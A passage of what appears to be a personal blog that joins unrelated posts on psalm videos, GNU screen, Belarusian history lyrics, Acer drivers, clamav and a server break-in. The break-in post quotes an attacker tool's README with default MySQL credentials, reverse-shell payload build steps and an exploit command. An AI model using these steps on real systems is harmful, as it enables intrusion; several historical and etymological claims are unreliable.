I have idea to collect if possible all performance of Psalms in the Orthodox Church. I'm not sure if I would be able to find all of them in the internet. So far I could find the first 3 performed by Church choires and monasteries. Hopefully if God bless so I will be able to make a list of all Psalms as Sung by our brothers and sisters in Christ.
† Bigorski monastery † – Blessed is the man (Psalm 1) 2007
Romanian Orthodox Chant – Psalm 1,2,3 at Putna Monastery
PSALM 3 – ORTHODOX CHRISTIAN SONG (Sung by an Orthodox Christian
Fr. Yousef Asaad – Psalm 3 (Coptic Orthodox Church chant)
As GNU / Linux user I use screen window manager to manage multiple SSH connections (all over one ssh connection) to a host over the last maybe 10 years. Though screen is generally popular it is still possible some novice sysadmin did not use it or (hope not) never heard of it. For those who don't use GNU screen still, give it a try; launch it within a (system bash, csh etc.) shell and then inside the main screen window launch multiple screen internal sessions (by pressing simultaneously) keys CTRL + ALT + c .
Each CTRL + ALT + c makes screen open a new "Virtual Window (pty)" inside itself, the multiple screen sub-instances are kept in memory of main screen program loaded in memory. In a way Virtual Windows of screen in logic are very Similar to Apache's Webserver Apache Parent and Child processes.
Anyways to test screen type in console:
And press enter twice, it will launch under screen a new instance of your current logged in shell (if you logged in bash will open bash if zsh – zsh etc.)
Afterwards, you can open multiple Virtual Screens as I've mentioned with pressing CTRL + ALT + c. Moving between all open screen sessions is done with simultaneous press of:
CTRL + ALT + p – To move to previous screen Virtual Window Shell Session CTRL + ALT + n – To move to next screen Virtual Window Session
The most useful from all screen functionality is DETACH. You can detach (like save state of) curreng GNU Screen active sesion by pressing together:
CTRL + a + d – Detach current active GNU Screen session
Screen supports detaching multiple sessions (whether 2 or more screen sessions run with identical user credentials).
An example use of multiple detached screen sessions would be if you login via SSH with a certain user lets say user myuser and later detach by pressing CTRL + a + d after which open new session, you will get in shell message similar to:
[detached from 1549.pts-11.pcfreak]
The msg indicates new screen session is detached. Onwards run screen once again, for sake of test typing in same shell once again:
After screen loads its second session press again CTRL + a + d – to detach second active session, again you will get msg:
[detached from 15691.pts-0.pcfreak]
Next on you can use screen to list all active window sessions by issuing:
pcfreak:~$ screen -list There are screens on: 1549.pts-11.pcfreak (10/27/2012 09:45:58 PM) (Detached) 15691.pts-0.pcfreak (10/24/2012 02:50:06 PM) (Detached) 2 Sockets in /var/run/screen/S-hipo.
To attach to detached active GNU screen session, use:
pcfreak:~$ screen -r PID_OF_SESSION
For example to attach to 1 listed screen session 1549:
pcfreak:~$ screen -r 1549
To attach to second one 15691:
pcfreak:~$ screen -r 15691
The -r switch stands for re-attach and second part of PID name like in above example pts-11.pcfreak pts-0.pcfreak is just indicating the hostname where screen was detached as well as the pty (pseudo tty number assigned to detached session), the time included shows the exact time in which main screen session was started for instance for screen 1549 it is 10/27/2012 09:45:58 PM.
The 2 Sockets in /var/run/screen/S-hipo displays the directory location of the screen socket, on each screen user startup a separte directory is created in /var/run/screen, the attach detach of screens is done via using a UNIX socket (fifo named pipe):
pcfreak :~$ ls 1549.pts-11.pcfreak| 15691.pts-0.pcfreak| byobu.reload-required* pcfreak:~$ cd /var/run/screenS-hipo pcfreak:/var/run/screen/S-hipo$ file 1549.pts-11.pcfreak 1549.pts-11.pcfreak: fifo (named pipe)
Many people who still remember irc clients like BitchX and epic and the IRC times should remember, how well known and frequent people used to detach those progs or even detach eggdrops with specific TCL scripts inside separate screen sessions.
The most useful use of screen of course is to open multiple SSH sessions to different server nodes and keep permanently logged in on hosts by detaching the screen session.
I can think of 3 main advantages of using ssh inside single screen session:
1. At any time you can login to just one server instead of (for exmpl. 10 servers), and use this one server as a reference through which you can "stuntly" check statuses of all 10 hosts with no need to login 10 times via SSH or with a Putty client (if logging from Windows)
2. If you're using unstable often interrupted lets say modem (dial up) line to connect to the Internet and you need continuation of previously interrupted SSH ssh login due to interrupted connection
3. You can save a lot of time and effort of typing passwords multiple times at ssh login prompts
Of course there are disadvantages too;
From security point of view it is a weak practice to keep logged in to multiple servers via SSH from one single screen session. If someone sniffs user password with which screen is started and attach to the screen session he will suddenly be granted to access to 10 more servers! Anyhow for lazy people who believe to maintain high security policies, e.g.:
a. do not login to SSH sessions from Windows hosts b. use some kind of UNIX / Linux / BSD based OS c. login from a host used only by a single person etc. etc. , keeping screen detached with multiple sshs might save you a lot of time; this is especially if you have to login 10 times to the servers a day changing location – lets say if you use (notebook and travel a lot).
GNU screen also understands some commands, which can configure the Shell Prompt of it as long as color gamma of main and sub-screen (virtual) sessions. To have a screen shell prompt outline and blue color gamma as in the picture in beginning of my post you can download and use my .screenrc into your ~/.screenrc i.e.:
In case you see some screens, like this you should use screen -wipe to cleanse socket pointing to already non-existing screen:
pcfreak:~$ screen -wipe
Screen has plenty of other command shortcuts, all of them are starting with a key combination of CTRL + a + )some kbd letter)
CTRL + a + a – Does switch between first and last screen open windows
CTRL + a + H – Turns screen log on for active screen session
Ctrl + a + m – Turns (on/off) screen monitoring for activity of a screen shell (useful if you left kernel, openoffice or some huge app to compile
CTRL +a + _ – Turns monitoring and reports outside of screen session if a running shell inside screen is not active for more than 30 seconds
CTRL +a + shift + S – Is very handy as it splits the screen between all logged in active screen sessions (Use control CTRL + a + tab to switch between splitted windows)
Ctrl + a + x – locks the screen, in the same fashion as Screen Lock is done inside a GUI environment GNOME, KDE etc. Once pressed it can be unlocked after you type in your user pass. This is very handy if you have to go to toilet and you don't want your colleague to snuff in your console 🙂
It is also possible to switch between screen sub-virtual windows using:
CTRL + a + (number starting from 0), e.g.:
CTRL + a + 0 CTRL + a + 1 CTRL + a + … CTRL + a + 9
There are plenty of other helpful functionalities which you might want to look in the manual (man screen) – check in the manual section DEFAULT KEY BINDINGS section
P. S. – Some of screen keybindings, does not work in gnome-terminal and konsole and other terminal clients which already had a key bindings set to CTRL + a + whatever key. If that's the case you can change screen assigned keybindings through .screenrc
If you google around you will find a dozen of tricks you can do with screen, since my only goal of this article
I've been recently interested in Belarusian History. I found few very interesting videos in youtube, so decided with people who want to learn more about Slavonic Culture. Belarus is a Slavonic culture and old Belarusian language dates back to Ancient Bulgarian traditions. Also Belarusian Ancient language includes a lot of Slavonic Ancient Bulgarian words. As a Bulgarian it is very interesting to me too the severe impact that our Great Bulgarian nation had on Slavonic Nations and Russians. Belarusians both lingually and culturely are very close to us Bulgarian. Orthodox Christian faith which later spread in Belarusian lands, has also been transferred from Bulgarian and Serbian lands to Belarus. After the pupils of Saint Cyril and Methodius, spread Slavonic alphabet in nowdays Romanian lands, Moldova and Belarus. The first below video Belarus History in 5 minutes has a genuine video and musical arrangment. It was quite interesting to me, find out Belarussian people had a long known tradition in Musical Instruments and Folklore Music. Nowdays they produce also a great Gothic Music, just like most of celtic nations 🙂
History of Bulgarus in 5 minutes – Aristic short presentation lesson on Belarussian history
At first, there was nothing
now there’s a lot of everything
we have to thank God for that
He created our world in the freestyle genre
He said, "Budzma" (“So be it!”)
and Our Land appeared.
Ichthyosauri and other dragons…
in the beginning, we lived in the ocean
but then we left the bosom of the sea
and started to be called the Neuri.
From the earliest times
the Neuri could turn into wolves
that was a customary thing for them…
Žycien, Piarun, Dažboh, and Svaroh
our ancestors believed in heathen gods
but Christianity already knocked on the door.
Let’s know our roots! The Belarusians, the daring people!
In the year 862 of our era
the city of Polacak was mentioned for the first time
There, St. Safija Cathedral was build
(there’re only three such churches in the world)
Local Prince Usiaslau Caradziej
was a cool personage; Listen what I say!
St. Jefrasinnia lived in Polacak
the memory of her is cherished down the ages
The famous cross was made for her
(it wasn’t just super, it was marvelous)
but during WWII, it was lost
and now it’s our own grail
Let’s continue, let’s march ahead
The time of Grand Prince Mindouh came
and here we must remember that
Belarus was called Litva then
or rather – the Grand Principality of Litva
its coat of arms was Pahonia (pursuit)
it had a formidable army
Our capital Vilnia was founded by
Grand Prince Hiedymin
the legend says he had a dream about an iron wolf…
Wikipedia describes this event
Let’s know our roots!
The Belarusians, the daring people!
The year 1362
The sword is drawn; flags flutter in the wind…
In the Battle of Blue Waters
our army defeated three Khans of the Golden Horde
and the Grand Principality of Litva suddenly
became the largest country in Europe
Let’s continue, let’s march ahead.
Vitaut reigns in the Grand Principality
The Teutonic Order threatens us.
The Battle of Grunwald shows who’s right
Vitaut and Jahajla, King of Poland
junked the Crusaders like scrap metal
Francysk Skaryna was a tough guy
he went to study abroad
He was the first who printed the Bible
in the Old Belarusian language in Prague
Our warriors were tough men, too
they defeated the Moscow Army near Vorsa
in the year 1514
In the meantime, the Grand Principality of Litva
accepted its constitution – the Statute of the GPL 1588
In the Battle of Kircholm, we defeated the Swedish army
Apparently, you didn’t know this fact before.
Let’s know our roots!
In the city of Mahilou
7,000 invaders were killed in the fight
Who were these invaders? Well, these … from the East
representatives of the "brotherly" Russian nation
They were called Muscovites then.
And there’s already a new state
the Polish–Litvian Commonwealth
For some reason, it irritated all the neighbors
The three partitions of this Commonwealth
and we were divided between three states
The biggest part was occupied by Russia
It engendered discontent among the nobility
and Tadevus Kasciuska appears on the scene
It’s necessary to remember this name because
he was a great revolutionary
for liberty, equality and fraternity
he struggled even in the United States
but the Russian Tsar cast him into prison
Let’s know our roots!
During Napoleon’s war
the Belarusians fought with the Belarusians
and in 1863 there was a new rebellion
Kastus Kalinouski, a patriot of Belarus
and his peasant soldiers – "kasiniery"
struggled for independence
but he was caught and hanged in Vilnia
The world enters the 20th century
It’s necessary to revive our culture!
Bahusevic, Bahdanovic, Kupala and Kolas
Lastouski, Luckievic… Many people!
Dozens and dozens of outstanding names…
but the Red Revolution is approaching fast
Well, in the terror of the Revolution
a new state with a beautiful name was born
the Belarusian People’s Republic
We still celebrate the day it was proclaimed
But suddenly, out of the blue
another Republic was installed here
its name wasn’t romantic at all
Belarusian Soviet Socialist Republic.
The 1920s. We remember that time
Belarusianization is everywhere
Writers publish their excellent works
Viciebsk artists create their chefs-d’oeuvre…
This process was stopped
in the year 1937
the blood purge began.
After that, one more hell – WWII
There were invaders, there were partisans
the country was torn apart again…
The Belarusians fought with the Belarusians again
shedding each other’s blood
The war is over! No need to fight!
There’re cosmonauts flying in the sky
Maserau, it’s time for you to speak!
Piesniary, it’s time for you to sing!
Barys Kit, make your discoveries for NASA
and we keep living in our country
which name now is the Republic of Belarus
We’ve got our ensign and national emblem
we sing our songs and read our poems…
the year 1991…
Let’s know our roots!
The Belarusians, the daring people!
We stop here, but now it’s your time
All of you can write your own continuation…
Let’s know our roots!
The Belarusians, the daring people!
Let’s know our roots!
The Belarusians, the daring people!
Budzma viedac svoj rod!
Salony narod, Bielaruski narod!
History of Belarus Гісторыя Беларусі Historia Białorusi _ – 8 minutes video explaining in short Belarusian etymological roots
As my blog readers might, know I'm running Debian Squeeze on my notebook as a Desktop OS. Until some time I used to be a big fan of Epiphany but lately I started not using Epiphany so much because of its too frequent crashes while browsing a website that contains Flash. The problem of course is not in Epiphany itself but in the flash but still, as this is really disturbing if someone works, I nowdays use only Firefox. I tried for a while to use IceWeasel, but IceWeasel (Firefox) version is too old:
Thus I use a custom download binary release from Firefox's website the one distributed as of time of writing post in archive firefox-16.0.2.tar.bz2
One of main advantages of installing the custom binary from Firefox, website is it auto updates and I'm always running the latest Release on myLinux Desktop, something IceWeasel still doesn't.
My current firefox version is:
hipo@noah:/opt/firefox$ /opt/firefox/firefox –version Mozilla Firefox 16.0.2
All works fine with it, except two little things;
One is Firefox development team compiled the Browser to still use OSS and not the newer and used almost by all programs ALSA (Advanced Linux Sound Architecture) – something that is unfortunately irreversalble
Secondly (which is the reason to write this)Firefox Linux version – doesn't by default Restore closed browser open tab websites! – e.g. session restore in those Firefox version is not working.
In Windows Firefox usually asks, while closing the whole browser, if the user wants to Save Browser Session, on the Linux version this is not default behavior, maybe developers have to answer why?
I had to fix one old notebook computer Acer Aspire model 5100 – 5023. The PC was preloaded with Windows 32 bit XP by someone but the drivers were not installed. I tried installing the drivers downloading them from Acer.com's website drivers download section from here . However the PC in question as it was writen on the vendor sticker was not 5100 but some kind of 5100 modification laptop. Some of the few differences between Acer Aspire 5100 and Acer Aspire 5023 are 5100 is bundled with Camera and a TV Tuner, whether 5100-5023 is without WebCam and TV Tuner.
The most important drivers I've downloaded rom Acer.com's for me was the Wireless Adapter drivers, because without internet on it takes time downloading drivers from my notebook and moving them via an USB stick … I've downloaded drivers for Wireless as provided by website (Wireless_Atheros_184.108.40.206) but installing them though I didn't get any error and the drivers brought up the Wireless Adapter, somehow I couldn't connect to any wireless network protected with WPA2-PSK key (passphrase) encryption. The Windows XP installed by somebody before I received the laptop for repair was Service Pack 2 (SP2) and latest stable Win XP is with SP3 as well as a bunch pack of updates after SP3 so updating Win XP SP2 to Win XP SP3 would have probably take more time than a clean re-install. Besides that the Computer did not have any information to backup as it was bundled with a fresh Win XP SP2 so formatting was not a problem either.
Thus Ire-installed over OS, formatting with Quick Format and a clean latest Windows English XP SP3 .
After re-installing it took me a while of pondering until I figure out what drivers I need to install, I knew for sure there might a problem with Wireless Adapter as on the previous WIN XP installed it did not work. So before proceeding to download all for Acer Aspire 5100 from acer.com's website, I first used Everest 2.20 Home edition to check the exact PC hardware Vendors and consequentially look for the correct WI-FI driver. Everest identified the Wireless Adapter as
so I looked on the Net for the driver. Actually there are some other brand notebooks which also come bundled with NE785H (i.e. Asus, HP). First I couldn't find correct driver for Acer and give a try installing a NE785H driver for Asus notebook this did not make the WI-FI work correctly, so after a further investigation I found Wireless NE785H 32 bit Windows XP driver for Acer laptops a mirror of is here
Two important notes to make here is I had a severe problem with the notebook touchscreen and for a long time I thought TouchScreen device is not working because of improperly intstalled driver (in Drivers provided by Acer.com there are two drivers provided for two different TouchPad devices – (Synaptics and Elantech). I tried installing them one by one and both together but in any case the TouchScreen did not react but keep hanging – fixing it was as simple as pressing simultaneously FN + F7!
Also another obstacle, I've faced was with the Video Card the notebook is with Integrated ATI Radeon Xpress 1100 as visible in Everest, drivers. In list of drivers on acer.com's website there was not a VGA driver for XP? This was puzzling so I googled and found few ATI Radeon Xpress 1100 drivers for other notebook vendors just like with Wireless. Downloading and testing other vendors drivers seem to install well but inside Control Panel -> System (Device Properties) -> Peripherals Video Card was with yellow questionmark (not properly working) …
It took me a while to figure it out but later it appeared for Windows XP VGA drivers for Aspire 5100 – 5023 (ATI Radeon Xpress 1100) are there under the not so intuitive name Chipset_ATI_8.251.060427_XPx86.zip. Updating the improper driver inside System -> Peripherals -> Video Adapter with the one from the zip made the Video card finally work 🙂 With rest of PC hardware drivers, there was not issues, I just had to install as usual all rest from vendor ZIPs:
This exact server has about 100 Gigabytes of data all contained on one hard disk partition;, thus check up of all files took a few hours. clamav is relatively slow, compared to DrWeb or nod32. But since I'm not in a hurry plus, we can't afford to spend some extra money to buy AV just for one scan I left it scanning in a separate screen sesion.
clamscan execution put some extra load on the server (which btw is used mainly for processing a multitude of SQL queries and provides some HTTP access to few websites via Apache server. After the scan was completed I ended up with enormous very clamav log file, listing all scanned files:
I checked the file content in vim, but as reviewing 119MB of log line by one! – is unthinkable task, e.g.:
debian:~# du -hsc /var/log/clamav_scan.log 119M /var/log/clamav_scan.log 119M total
I did quick review of clamav_scan.log and tailing it displays me::
# tail -n 10 /var/log/clamav_scan.log ----------- SCAN SUMMARY ----------- Known viruses: 1270572 Engine version: 0.97.3 Scanned directories: 18927 Scanned files: 221445 Infected files: 44 Total errors: 287 Data scanned: 12457.43 MB Data read: 97007.10 MB (ratio 0.13:1) Time: 1842.362 sec (30 m 42 s)
Thus I needed a way to not read screen by screen all by screen to see what was detected as Infected Files, but just show only infected files found by clamav.
Since cat-ing the log is worthless however it is much better to only do grep "found" clamd.log or as in my case file is clamav_scan.log do:
# grep -i 'found' /var/log/clamav_scan.log
/usr/share/clamav-testfiles/clam.bz2.zip: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.d64.zip: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.ppt: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.tnef: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-aspack.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe.rtf: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.7z: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam_IScab_ext.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.odc.cpio: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.newc.cpio: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.pdf: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-wwpack.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.ole.doc: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.cab: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-mew.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-petite.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.sis: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-fsg.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam_cache_emax.tgz: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe.bz2: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam_ISmsi_int.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe.szdd: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.chm: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.arj: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam_IScab_int.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.ea05.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.tar.gz: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe.html: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe.binhex: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.impl.zip: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-upack.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.bin-be.cpio: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.mail: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe.mbox.uu: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.zip: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-nsis.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam_ISmsi_ext.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-yc.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.bin-le.cpio: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-upx.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam-pespin.exe: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.exe.mbox.base64: ClamAV-Test-File FOUND /usr/share/clamav-testfiles/clam.ea06.exe: ClamAV-Test-File FOUND
Surprisingly all the "Infected" files turned to be a regular clamav scan (virus, spyware badware testfiles – i.e. clamav just use this file to check its database definitions works okay). Thus the supposingly Infected files: 44 turned to be just another false positive.
Actually this grepping and logging of all scanned files, nevertheless they're not infected is completely useless. Thus it would have been much better if instead have run clamscan with cmd options:
debian:~# clamscan -r /* --infected
I hope ppl reading this article wouldn't repeat my "mistake". In mean time after this thing here, maybe it will be a good idea to schedule 2 weeks or 1 months period clamscan of whole file system to make sure someone doesn't uploaded some malicious PHPShell script, exploit or other unwanted stuff.
I've noticed some kind of script kiddie gained access somehow on one of the servers, I administrate. A MS-SQL Scanner tool called sslog, was downloaded in tmp and run with root user credentials.
The cracked victim host is running Debian Linux Squeeze and last security update, I've made about few months ago. Inside /tmp/.a/ directory, I've found 0day MS-SQL scanner called mysqljackpot. Maybe the tool is still private exploit scanner because on the Internet I couldn't find it anywhere.:
# ls -al /tmp/.a total 52 drwxr-xr-x 5 root root 4096 Oct 29 01:10 ./ drwxrwxrwt 10 root root 36864 Oct 29 14:46 ../ drwxr-xr-x 3 root root 4096 Oct 27 21:46 mysqljackpot/ drwxr-xr-x 3 root root 4096 Oct 28 16:58 new/ drwxr-xr-x 3 root root 4096 Oct 29 12:48 pass-multe/ # ls -al /tmp/.a/new/ total 12 drwxr-xr-x 3 root root 4096 Oct 28 16:58 ./ drwxr-xr-x 5 root root 4096 Oct 29 01:10 ../ drwxr-xr-x 3 root root 4096 Oct 29 00:58 mysqljackpot/
After further investigations, I've realized ./sslog is actually a frontend scanner program (Synscan 5.02):
root@host:/tmp/.a/new/mysqljackpot/scanner# ./sslog Synscan 5.02 (http://www.digit-labs.org/files/tools/synscan/) by John Anderson , Neil Kettle . ./sslog: getuid(): UID or EUID of 0 required
As you see in order for the scanner to run it requires to be root with superuser privileges.
mysqljackpot is actually a brute force tool which as explained in a file (README.mysql), found in its directory :
Here is content of README.mysql:
MySQL Login Scanner By Kingcope REQUIRES A FAST SCANSERVER!!! DONT TRY TO RUN THIS FROM A SLOW CONNECTION! ***
Scans for open mysql servers with the following credentials: root <nopass> root mysql root root admin <nopass> admin admin admin mysql mysql <nopass> mysql mysql
Runs on linux. Requirements: mysql development libraries and headers Compile (try one of the following depending on your system): $ ./configure LIBS=-lmysqlclient OR $ ./configure LIBS="-L/usr/lib/mysql" -lmysqlclient OR $ ./configure LIBS="-L/usr/lib64/mysql" -lmysqlclient OR $ ./configure CFLAGS="-lmysqlclient"
3. Compile the reverse shell payload (this is required!) required because the connect back ip and port are hardcoded in the dll: use mingw on windows or wine change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have to change the port in mysqljackpot.c too (default port: 443). issue commands: set PATH=%PATH%;c:\MinGW\bin\ gcc -c payload.c gcc -shared -o payload.dll payload.o -lws2_32 copy the payload.dll into the mysqljackpot exploit folder
4. Run The Exploit ./mysqljackpot -u root -p "" -t 220.127.116.11 A valid database admin user and his password are required for the exploit to work properly. This exploit is especially useful when used in connection to a MySQL login scanner, see scanner/README.mysql inside this package. Be sure to have the firewall open on the desired reverse port on the attacking machine.
5. Enjoy your SYSTEM Shell!!!
Here is also the header from mysqljackpot.c mysql username brute force tool:
/* Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday * Copyright (C) 2012 Kingcope * * Thanks to danny. */
After thinking over the security breach I thought of few scenarios on how the attacker entered and run as root superuser. One is;
Cracker entered directly via SSH after sniffing somehow the root password.
After however, a review of last cmd, I've concluded this case is not very likely, e.g.:
# last |grep -i root
did not found any logs, of unusual root logins, neither there seem to be any unusual activity with logins with other non-root users. Of course it is possible someone logged in as root and used some tool to clean, his tracks with some kind of user log-cleaner tool like the one I've written in past in bash this doesn't seem very likely however because. It seem the /tmp/.a/, directory was created by some amateur script kiddie, a professional one would create some a bit smarter directory like for example just few empty spaces , i.e. would create it with, lets say::
# mkdir " "
instead of the so trivial
# mkdir /tmp/.a/
Also the name of the directory containing the script kiddie tool /tmp/.a is not selected intelligently, but just done in a hurry, hence I even assume /tmp/.a, is created by some automated SK tool writen in hurry by some Romanian SK Cracker 🙂
On the host there was webmin and usermin running. So;
my second assumption was it could be someone sniffed a login password via encrypted SSL connection, whether the root logged in via webmin, or somehow exploited usermin (though I should say usermin (which listens by default on port number 20000)
TCP port 20000 on which usermin listens by default is filtered by an iptables rules for all hosts incoming connections, whether webmin logins are permitted only from few IP addresses. Thus this scenario, though more possible than a direct SSH login with root sniffed password still seems to me not very probable.
Therefore as a third scenario (most likely what happened), I assume some of the PHP forms on the server or some other undefined PHP excecutable via Apache variable script was missing definition.
Actually saw in /var/log/apache2/error.log plenty of re-occuring warnings of existing undefined variables:
[Mon Oct 29 16:30:43 2012] [error] [client 18.104.22.168] PHP Notice: Undefined variable: not_assign in /home/site_dir/www/modules/start.mod.php on line 121, referer: http://site-domain-name.com/start?qid=3&answered_id=4 [Mon Oct 29 16:30:43 2012] [error] [client 22.214.171.124] PHP Notice: Undefined variable: counter_cookie in /home/site_dir/www/modules/start.mod.php on line 130, referer: http://site-domain-name.com/start?qid=3&answered_id=4 [Mon Oct 29 16:30:43 2012] [error] [client 126.96.36.199] PHP Notice: Undefined variable: campaign_cukie in /home/site_dir/www/modules/start.mod.php on line 135, referer: http://site-domain-name.com/start?qid=3&answered_id=4 [Mon Oct 29 16:30:43 2012] [error] [client 188.8.131.52] PHP Notice: Undefined index: actions in /home/site_dir/www/counter/count.php on line 11, referer: http://site-domain-name/start?qid=3&answered_id=4 [Mon Oct 29 16:30:43 2012] [error] [client 184.108.40.206] PHP Notice: Undefined variable: flag2 in /home/site_dir/www/counter/count.php on line 52, referer: http://iqtest.bg/start?qid=3&answered_id=4
Taking this in consideration, I assume the attacker, entered the system finding about the undefined variables, defining them and somehow achieving access to the www-data Apache user shell, and through this shell running some 0day Linux kernel exploit to gain root access and download and install mysqljackpot exploit scanner tool.
Found HIDDEN PID: 4994 Found HIDDEN PID: 13374 Found HIDDEN PID: 14931 Found HIDDEN PID: 18292 Found HIDDEN PID: 19199 Found HIDDEN PID: 22651 [*]Starting scanning using brute force against PIDS with Threads
# grep -i xzibit /var/log/rkhunter.log [16:52:48] Checking for Xzibit Rootkit... [16:52:48] Xzibit Rootkit [ Not found ] [16:52:56] Found string 'hdparm' in file '/etc/init.d/hdparm'. Possible rootkit: Xzibit Rootkit [16:52:56] Found string 'hdparm' in file '/etc/init.d/.depend.boot'. Possible rootkit: Xzibit Rootkit [16:53:01] Rootkit names : Xzibit Rootkit, Xzibit Rootkit
Onwards I checked content of hdparm and .depend.boot and there I don't see nothing irregular. They both are files from legitimate Debian install, I've checked if they belong to a deb packages as well if they are existing on other Debian Squeeze servers I administer as well as on my Debian Desktop notebook, everywhere they're present, hdparm is part of hdparm deb and .depend.boot is loaded by /etc/init.d/rc script, containing some user string references:
After a close examination of the system as well as research on the internet, I've figured out this is also a false positive. For sake of not distributing, Script Kiddie tools, which might put in danger other system administrators I will not put a download link to mysqljackpot publicly. Anyways if someone is willing to have it for study purposes, just drop me a mail and I will post you temporary download link to it.
Also as webmin and usermin is not frequently used, I've decided to completely stop and disable them to load on boot.
I've done also a clamav scan with (lowered priority) over the whole file system with:
# nice -19 clamscan -r /*
in order to determine, if there is no PHPShell or some kind of other remote admin Script kiddie script in perl / php etc. installed. Tomorrow, I will continue investigatin what is happening and hopefully once I got, how the abuser entered the server will update this post.
I have a task to fix one Acer Aspire 5100 Also known as Acer Aspire 5100-5023. After re-installing Windows XP on the notebook, I've downloaded correct laptop touchpad drivers as provided by acer.com's website here (TouchPad Section).There inside the ZIP, I've run all the 3 installers provided by Touchpad Driver Synaptics 220.127.116.11 .zip (e.g. Setup.exe, Elantech/setup.exe, Synaptics/Setup.exe).
When all installations were completed, after each one I had to do the standard restart.
For my surprise after Windows boot while testing TouchPad (scratching over it) the TouchPad moved the Mouse Pointer but, after a sec it stopped responding. This is the first time I face such problem so, my guess was either something is wrong with TouchPad Driver or / and the Driver is broken.
To make sure all is fine and driver show properly installed I checked if it is showing correctly installed in:
Control Panel -> System -> Hardware ->Device Manager
Solution was as easy as just pressing Fn + F7 key. I guess by mistake someone while testing the Function keys on this laptop disabled TouchPad device. The owner of the laptop had no idea about function keys so he never thought of this causes the whole issue. It seems stupidly enough Acer made the laptop function key remember the Function key choice, even after computer restart (pressing Fn+somenumber probably sets some settings in BIOS, so on next boot the settings keeps saved). BTW it might be worthy say, even re-installing with brand new Windows XP does not change a previously set Function setting. Actually it is rather strange why vendors make touchpads possible to disable; I never heard of anybody willing to disable his TouchPad ….
Also I've some people suggest Fn + F6 as a fix to those weird freezed TouchPad Problem, but I believe this are just rumors. Well that's, if you have the same Free Unresponding TouchPad on Acer another Notebook brand name, just enable pressing Fn + F7 keys or whatever Fn + Fx is on the notebook model. Hope this helps someone 🙂
Though funny and sometimes ridiculous the second presentation is quite interesting for people interested in Antrophology; how English Country and Language established and most people who somehow influence the development of English language as we know it.
Mongrel Nation – origin of english language
I knew English language used to be a mixture of French, German and dead Latin, but never thought the origin of most words are so mixed up. Also the story with King James Bible is very interesting, I never knew King James Bible Version. So widely known as ( KJV ) has plaid so essential role for English as we know it. As the video points out KJV, played most essenail role in all English history for development of the modern English language. As with mostly all else in modern developed civilization it is Strong Christian faith which play a key role in formation of a development of modern civillized society as we know it. It is a pity nowdays most English people and Westerners forgot, how important the Holy Bible (Bible btw means Book of Books Bi-Ble) and earlier Church teachings and writings were in order to have a good safety life, good fed people which live in the Western Countries. There was a good reason Why this Holy Bible translation still is referred as King James Bible. King James (19 June 1566 – 27 March 1625) was a very wise man (linguist and scientist) along with being a King of Great Britain France, Scotland and Ireland.
History of the King James Holy Bible version
Ancient English used to be called Anglo-Saxon English. The called Old English is part of the Germanic Languages group, so in theory nowadays should be much easier for a German, Dutch or some western person to speak English and understand its meaning than to people who belong to other main groups of languages like Slavonic Language group. Actually Slavonic Language group has also taken a multitude of words from German language, so situation with categorizing languages is not so clear to do. It was really interesting to me to learn Dutch Language is maybe in a way more close to primordial Original Anglo-Saxon English. This explains also how comes Dutch in general contains so much English in it and also so many English lingual structure 🙂
With all said, it is clear English as we know it just a mixture of words taken from languages around the world. Colonization that Great Britain did in past also played essential role for the inclusion of new words within English Language and Enriching the Language so much. It is also clear, how it come to be that the English is relatively easy to learn and flexible enough to become an International Language as it is today. There were also factors the Invasive character of Great Britain, the migration of many British and Germans to America continent the creation of the United States. And the raise of the US this all played important role in wide-spread of English. Most importantly the World Politics and the interests of certain people (Masonry and Royal Groups), development of modern science, Isaac Newton and the many scientists or (pseudo-scientists) that UK give birth to played an important role for making English popular.
